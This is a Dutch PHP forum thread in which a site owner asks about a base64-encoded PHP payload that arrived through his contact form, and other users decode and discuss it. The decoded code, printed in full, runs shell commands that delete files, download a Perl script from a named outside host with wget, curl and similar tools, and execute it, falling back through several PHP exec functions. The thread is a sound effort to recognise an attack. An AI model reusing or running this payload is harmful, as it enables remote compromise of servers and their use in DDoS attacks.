malware hack poging

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Senior Developer Betty Blocks Blauwe Haven Rotterd

Functieomschrijving Voor de Politie zijn wij opzoek naar een Senior Developer Betty Blocks Blauwe Haven Rotterdam. De politieorganisatie heeft jaarlijks te maken met een aanzienlijk aantal politiemedewerkers die vanwege mentale overbelasting niet of beperkt inzetbaar zijn. De Blauwe Haven Rotterdam ondersteunt deze politiemedewerkers in hun herstel en re-integratieproces. De huidige digitale systemen van de Politie bieden onvoldoende ondersteuning in het herstel- en re-integratieproces van politiemedewerkers. Zowel voor de politiemedewerkers als voor de organisatie. Politiemedewerkers worden buitengesloten, waardoor zij eigen regie verliezen. Begeleiders kunnen de voortgang van de medewerkers niet goed monitoren. Management beschikt niet over de mogelijkheid trends te signaleren

Bekijk vacature »

Software Programmeur

Functie omschrijving Voor een informele club in omgeving Delft zijn wij op zoek naar versterking. Ben jij op zoek naar een nieuwe uitdaging als Software Programmeur lees dan snel verder! Als ontwikkelaar kom je terecht op een afdeling van 6 medewerkers. Werkzaamheden Programmeur Je bent bezig met het ontwikkelen van software en webapplicaties. Je kunt technische klussen uitvoeren op locatie. Je onderhoudt contact met de projectleider om er zeker van te zijn dat een project goed verloopt. Je zult klanten ondersteunen. Verder zul je technische ontwerpen en gebruikersdocumentaties schrijven en deze onderhouden. Er wordt voornamelijk gewerkt met PHP, Java en

Bekijk vacature »

Senior .NET developer

Klaar voor een nieuwe uitdaging? Welke technologieën gaan schuil achter de dagelijkse energievoorziening? Als senior .NET developer bij Kenter maak jij samen met je team het verschil, zowel voor de interne organisatie als voor eindklanten. Samen bouwen jullie aan innovatieve dienstverlening met behulp van de nieuwste technologieën en tools. Het is een functie met veel vrijheid, goede arbeidsvoorwaarden én je draagt jouw steentje bij aan de energietransitie. Klinkt dit als iets voor jou? Lees dan verder of solliciteer direct! Wat ga je doen als senior .NET developer? Als senior .NET developer bij Kenter (onderdeel van Alliander) ben je van onschatbare

Bekijk vacature »

Software Developer C# .NET

Functie omschrijving Software Developer C# .NET gezocht voor een dynamische organisatie! Ben jij net afgestudeerd of toe aan een volgende stap in je maatschappelijke carrière? Lees dan snel verder! Wij zijn op zoek naar een Software Developer die klaar is voor een nieuwe uitdaging en die een organisatie in de regio Houten wil versterken. Je werkt in deze functie aan verschillende projecten en gaat vaak op bezoek bij klanten. In deze functie kun je een grote mate van uitdaging, diversiteit en verantwoordelijkheid verwachten. Bedrijfsprofiel Waar kom je te werken? Je komt te werken bij een organisatie dat gespecialiseerd is in

Bekijk vacature »

.NET developer

Functie Als .NET ontwikkelaar ga jij aan de slag bij een van onze klanten actief in de High Tech Industrie. Onze klanten zijn voornamelijk gelokaliseerd in de omgeving van Eindhoven. Wij zijn erg selectief als het gaat om de projecten die wij accepteren en richten ons dan ook alleen op innovatieve en complexe projecten. Omdat onze klanten voornamelijk gespecialiseerd zijn in de machinebouw, werk jij ook vaak dicht tegen de machines aan. Ons team bestaat momenteel uit Embedded engineers, IOT developers en Cloud engineers. Wij werken voornamelijk aan Microsoft projecten waar er gebruik wordt gemaakt van WPF, UWP, .NET Core

Bekijk vacature »

.Net ontwikkelaars voor de zorgsector

Bedrijfsomschrijving Voor onze klant in de omgeving van Zwolle zijn wij op zoek naar een ervaren .Net ontwikkelaar, bij voorkeur met ervaring binnen de belangrijkste sector van Nederland, namelijk: de zorgsector. Deze internationale organisatie ontwikkelt software voor de zorgsector. Er werken zo'n 25 medewerkers hard aan een oplossing die gebruikt wordt door heel Nederland. Er heerst een informele sfeer waarbij er altijd ruimte is voor een grapje. Je collega's zijn stuk voor stuk sterke ontwikkelaars vanuit verschillende achtergronden en met verschillende leeftijden. Je komt hier terecht in een organisatie die zich hard inzet om de zorgsector te verbeteren. De mogelijkheden

Bekijk vacature »

Anaplan Developer

Dit ga je doen What are you going to do: Picking up Stories: Design planning had, how are we going to build it in Anaplan; Talking to the end user to build a forecasting model; Having contact with the data team about which data is needed; Being able to convert an Excel sheet into a 3, 4 or 5 dimensional modeling environment; Giving knowledge sessions about Anaplan; Solving incidents; Making instructional videos on how teams should read forecasts; Writing blogs about forecasting. Hier ga je werken We are looking for an Anaplan Builder to deliver end-to-end solutions within a big

Bekijk vacature »

Fullstack JavaScript developer (ReactJS, NodeJS, T

Functie Het team bestaat momenteel uit ruim 15 collega’s, waarvan ruim de helft in het ontwikkelteam werkzaam is. Er zijn gave plannen om het platform ook te gaan toepassen op bijv. vliegvelden, maar ook internationale groei zit in het verschiet en daarom zijn ze op zoek naar versterking. Als Fullstack JavaScript developer werk je nauw samen met 9 fullstack (Python en .NET) developers. Binnen het team ga jij je toespitsen op het creeren van de optimale toegankelijkheid en user experience. Om dit voor elkaar te krijgen zul je ontwerpen, programmeren, testen en implementeren. Het hele proces dus! Maar ook bijvoorbeeld

Bekijk vacature »

Software Ontwikkelaar .NET te Zaandam

Bedrijfsomschrijving Je komt hier terecht bij een door-en-door softwarebedrijf, waarbinnen meerdere SaaS pakketten worden ontwikkelt voor diverse sectoren. Hierbij kun je denken aan bijvoorbeeld de logistieke en medische branche. Deze organisatie kenmerkt zich door de hoge mate van complexiteit in de applicaties, wat betekent dat jij je hier niet zal gaan vervelen. Integendeel: Jij gaat hier elke dag ontzettend veel leren en je in razend tempo ontwikkelen als C# .Net Developer met focus op back-end. Het team bestaat uit ongeveer 20 personen personen, waarvan het grootste deel zich richt op software development. De sfeer is informeel en professioneel. De producten

Bekijk vacature »

Junior PHP Developer

Dit ga je doen Software development met behulp van C# .NET en / of PHP, je mag zelf kiezen waar jij je in wil specialiseren Meedenken over het nieuwe pakket, waar moet het aan voldoen? Unit-, integratie- en diverse andere tests schrijven en uitvoeren Nauw samenwerken met je IT collega's zoals Testers, Developers, DevOps Specialisten en Architecten Jezelf ontwikkelen met behulp van trainingen en cursussen Hier ga je werken Onze klant, een grote speler in de medische sector, is op zoek naar een enthousiaste junior (of meer ervaren) Software Developer die klaar is voor een nieuwe stap in zijn of

Bekijk vacature »

Senior PHP Developer

Als Senior PHP Developer bij Coolblue zorg je ervoor dat onze webshops elke dag een beetje beter zijn en coach je andere developers op de hard en soft skills. Wat doe je als Senior PHP Developer bij Coolblue? Als PHP Developer werk je met andere development teams samen om onze webshop zo optimaal mogelijk te laten werken en onze klanten blij te maken. Hoewel je een PHP Developer bent, sta je open om C# of Typescript in te zetten of te leren. Ook PHP Developer worden bij Coolblue? Lees hieronder of het bij je past. Dit vind je leuk om

Bekijk vacature »

Junior .NET developer

Functie Als junior .NET developer start jij in een development team met twee ervaren software ontwikkelaars. Jouw persoonlijke ontwikkeling is voor ons erg belangrijk en jij gaat dan ook meelopen met onze Senior .NET ontwikkelaar die jou met zijn kennis en ervaring een goede begeleiding kan aanbieden. Als team zijn jullie verantwoordelijk voor het schrijven van software voor onze toonaangevende Automatiseringssystemen. Jij gaat aan de slag met de onderhoud van de kernsoftware, ondersteund de software van derden door het gebruik van onze webservices en als team zijn jullie verantwoordelijk voor het ontwikkelen van onze backend oplossingen. Wij maken op dit

Bekijk vacature »

Infrastructure Developer

Vacature details Vakgebied: Software/IT Opleiding: Senior Werklocatie: Eindhoven Vacature ID: 12945 Introductie Our client is one of the most innovative companies within the Netherlands. Currently we are looking for an Infrastructure Platform Engineer. Within this role you will be developing the infrastructure. Functieomschrijving Within this role you are responsible in the development of our distributed data and compute platform infrastructure. You will design, develop and implement new features and fixes. Next to this you will integrate and configurate other packages that supports the development of tuning applications within the organisation. You will support customer sites remotely. Design and implement the

Bekijk vacature »

.NET developer

Functie Als ervaren .NET ontwikkelaar start jij een team met 12 programmeurs. Jullie zijn verantwoordelijk voor het huidige platform van deze organisatie. Als team werken jullie in tweewekelijkse sprints en starten jullie iedere dag met een stand-up. Jij werkt samen met jouw team aan het uitbreiden van het huidige platform door middel van nieuwe features. Daarnaast zorg jij er samen met jouw team voor dat het platform veilig is en gebruiken jullie de nieuwste technieken om deze veiligheid te waarborgen. Zo maken jullie gebruik van C# .NET, .NET Core, React, Azure, Kubernetes, ASP.NET, MVC. Jij gaat aan het werk in

Bekijk vacature »

Embedded Developer C++

Functie omschrijving Ben jij op zoek naar een leuke uitdaging als Embedded Developer, zoek dan niet verder! Voor een leuke opdrachtgever in omgeving Rotterdam zijn wij op zoek naar een Embedded Developer die graag met Embedded Devices werkt. Je zult verantwoordelijk worden voor het ontwikkelen en onderhouden van diverse producten. Jouw specialisatie ligt op het vlak van software, hardware en back-end. Dit bedrijf is gespecialiseerd in het ontwerpen van software voor een unieke industrie. Wil jij betrokken worden bij een proces dat loopt van ontwikkeling tot installatie? Waarbij je bezig zult zijn met perfecte systemen die geleverd worden aan binnen

Bekijk vacature »
- Roland -

- Roland -

08/06/2014 11:19:32
Quote Anchor link
Nb. ik heb eval hier even vervangen door XXXX

Ik zie dit via een contact formulier binnenkomen:
Zou dit zo kunnen werken ?
[.php] is toch niet geldig (als alternative < ? p h p )

( . punt door mij toegevoegd )
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
[php]XXXX(base64_decode('ZWNobyAic2V4Y3JpbWUiOw==
ZWNobyUyMCUyMnYwcENyM3clM0NiciUzRSUyMiUzQiUwQWVjaG8lMjAlMjJzeXMlM0ElMjIucGhwX3VuYW1lJTI4JTI5LiUyMiUzQ2JyJTNFJTIyJTNCJTBBJTI0Y21kJTNEJTIyZWNobyUyMG5vYjBkeUNyM3clM0JjZCUyMC90bXAlM0JybSUyMC1yZiUyMGRvci4qJTIwKi50eHQuKiUzQmZldGNoJTIwaHR0cCUzQS8vd3d3LmxhLWJhdW1lLWRob3N0dW4uZnIvcGx1Z2lucy91c2VyL3Byb2ZpbGUvcHJvZmlsZXMvbG9nLnR4dCUzQnBlcmwlMjBsb2cudHh0JTNCcm0lMjAtcmYlMjBsb2cudHh0JTNCd2dldCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmN1cmwlMjAtTyUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmx3cC1kb3dubG9hZCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQmNkJTIwL3Zhci90bXAlM0JybSUyMC1yZiUyMGRvci4qJTIwKi5qcGcuKiUzQmZldGNoJTIwaHR0cCUzQS8vd3d3LmxhLWJhdW1lLWRob3N0dW4uZnIvcGx1Z2lucy91c2VyL3Byb2ZpbGUvcHJvZmlsZXMvbG9nLnR4dCUzQnBlcmwlMjBsb2cudHh0JTNCcm0lMjAtcmYlMjBsb2cudHh0JTNCd2dldCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmN1cmwlMjAtTyUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmx3cC1kb3dubG9hZCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQiUyMiUzQiUwQSUyNGVzZWd1aWNtZCUzRGV4JTI4JTI0Y21kJTI5JTNCZWNobyUyMCUyNGVzZWd1aWNtZCUzQiUwQWZ1bmN0aW9uJTIwZXglMjglMjRjZmUlMjklN0IlMEElMjRyZXMlMjAlM0QlMjAlMjclMjclM0IlMEFpZiUyMCUyOCUyMWVtcHR5JTI4JTI0Y2ZlJTI5JTI5JTdCJTBBaWYlMjhmdW5jdGlvbl9leGlzdHMlMjglMjdleGVjJTI3JTI5JTI5JTdCJTBBQGV4ZWMlMjglMjRjZmUlMkMlMjRyZXMlMjklM0IlMEElMjRyZXMlMjAlM0QlMjBqb2luJTI4JTIyJTVDbiUyMiUyQyUyNHJlcyUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3NoZWxsX2V4ZWMlMjclMjklMjklN0IlMEElMjRyZXMlMjAlM0QlMjBAc2hlbGxfZXhlYyUyOCUyNGNmZSUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3N5c3RlbSUyNyUyOSUyOSU3QiUwQUBvYl9zdGFydCUyOCUyOSUzQiUwQUBzeXN0ZW0lMjglMjRjZmUlMjklM0IlMEElMjRyZXMlMjAlM0QlMjBAb2JfZ2V0X2NvbnRlbnRzJTI4JTI5JTNCJTBBQG9iX2VuZF9jbGVhbiUyOCUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3Bhc3N0aHJ1JTI3JTI5JTI5JTdCJTBBQG9iX3N0YXJ0JTI4JTI5JTNCJTBBQHBhc3N0aHJ1JTI4JTI0Y2ZlJTI5JTNCJTBBJTI0cmVzJTIwJTNEJTIwQG9iX2dldF9jb250ZW50cyUyOCUyOSUzQiUwQUBvYl9lbmRfY2xlYW4lMjglMjklM0IlMEElN0QlMEFlbHNlaWYlMjhmdW5jdGlvbl9leGlzdHMlMjglMjdwb3BlbiUyNyUyOSUyOSU3QiUwQSUyNGYlMjAlM0QlMjBAcG9wZW4lMjglMjRjZmUlMkMlMjJyJTIyJTI5JTNCJTBBd2hpbGUlMjglMjFAZmVvZiUyOCUyNGNmZSUyOSUyOSUyMCU3QiUyMCUyNHJlcyUyMC4lM0QlMjBAZnJlYWQlMjglMjRjZmUlMkMxMDI0JTI5JTNCJTIwJTdEJTBBQHBjbG9zZSUyOCUyNGYlMjklM0IlMEElN0QlN0QlMEFyZXR1cm4lMjAlMjRyZXMlM0IlMEElN0Q='));die();[/php]


Gewijzigd op 08/06/2014 11:26:02 door - Roland -
 
PHP hulp

PHP hulp

01/06/2024 18:00:41
 
- Ariën  -
Beheerder

- Ariën -

08/06/2014 13:37:29
Quote Anchor link
Ik vermoed dat dit een hack is voor een bepaald 3rd-party webapplicatie?
Krijg je dit in een mail binnen?
 
- Roland -

- Roland -

08/06/2014 14:22:43
Quote Anchor link
ja, ik laat de inhoud van het contact formulier aan mezelf mailen.


"een bepaald 3rd-party webapplicatie?" ??? heb ik op deze site niet (gewoon een eigen siteje)
 
Peter  Flos

Peter Flos

08/06/2014 15:42:36
Quote Anchor link
Ik heb deze voor je gedecodeerd:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
echo%20%22v0pCr3w%3Cbr%3E%22%3B%0Aecho%20%22sys%3A%22.php_uname%28%29.%22%3Cbr%3E%22%3B%0A%24cmd%3D%22echo%20nob0dyCr3w%3Bcd%20/tmp%3Brm%20-rf%20dor.*%20*.txt.*%3Bfetch%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bwget%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bcurl%20-O%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Blwp-download%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Bcd%20/var/tmp%3Brm%20-rf%20dor.*%20*.jpg.*%3Bfetch%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bwget%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bcurl%20-O%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Blwp-download%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3B%22%3B%0A%24eseguicmd%3Dex%28%24cmd%29%3Becho%20%24eseguicmd%3B%0Afunction%20ex%28%24cfe%29%7B%0A%24res%20%3D%20%27%27%3B%0Aif%20%28%21empty%28%24cfe%29%29%7B%0Aif%28function_exists%28%27exec%27%29%29%7B%0A@exec%28%24cfe%2C%24res%29%3B%0A%24res%20%3D%20join%28%22%5Cn%22%2C%24res%29%3B%0A%7D%0Aelseif%28function_exists%28%27shell_exec%27%29%29%7B%0A%24res%20%3D%20@shell_exec%28%24cfe%29%3B%0A%7D%0Aelseif%28function_exists%28%27system%27%29%29%7B%0A@ob_start%28%29%3B%0A@system%28%24cfe%29%3B%0A%24res%20%3D%20@ob_get_contents%28%29%3B%0A@ob_end_clean%28%29%3B%0A%7D%0Aelseif%28function_exists%28%27passthru%27%29%29%7B%0A@ob_start%28%29%3B%0A@passthru%28%24cfe%29%3B%0A%24res%20%3D%20@ob_get_contents%28%29%3B%0A@ob_end_clean%28%29%3B%0A%7D%0Aelseif%28function_exists%28%27popen%27%29%29%7B%0A%24f%20%3D%20@popen%28%24cfe%2C%22r%22%29%3B%0Awhile%28%21@feof%28%24cfe%29%29%20%7B%20%24res%20.%3D%20@fread%28%24cfe%2C1024%29%3B%20%7D%0A@pclose%28%24f%29%3B%0A%7D%7D%0Areturn%20%24res%3B%0A%7D


Dat is wat eruit komt. Lijkt inderdaad op een hack, het is in ieder geval een stuk script.

Edit: Ik heb er een link uit gevolgeld:

-Verwijderd-

Deze link leid naar een DDos-Script toe. Ik neem aan dat je je emails vanuit je server zelf, of door je host veilig verstuurt?
Gewijzigd op 08/06/2014 17:49:58 door Peter Flos
 
Obelix Idefix

Obelix Idefix

08/06/2014 16:37:24
Quote Anchor link
Misschien handig/verstandig om die link dan niet als hyperlink op te nemen, als het naar een ddos-script leidt....
 
Peter  Flos

Peter Flos

08/06/2014 17:50:31
Quote Anchor link
Bij deze weggehaald, het ging mij er enkel om om te laten zien dat het dus een ddos poging is geweest.
 
- Ariën  -
Beheerder

- Ariën -

08/06/2014 19:01:06
Quote Anchor link
- Roland - op 08/06/2014 14:22:43:
ja, ik laat de inhoud van het contact formulier aan mezelf mailen.


"een bepaald 3rd-party webapplicatie?" ??? heb ik op deze site niet (gewoon een eigen siteje)

Dan is er niks aan de hand, lijkt me.
 
Christian k

christian k

08/06/2014 20:32:10
Quote Anchor link
als je dit binnen krijgt zonder dat je het zelf geprogrammeerd hebt,
is er wel wat aan de hand lijkt mij?
of zit ik nu fout?
ik zie namelijk niet in hoe een script dit kan versturen zonder dat jij die functie
er in hebt gebouwt?
 
- Ariën  -
Beheerder

- Ariën -

08/06/2014 21:15:25
Quote Anchor link
Een botje die denkt dat je een lek 3rd party script gebruikt?
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.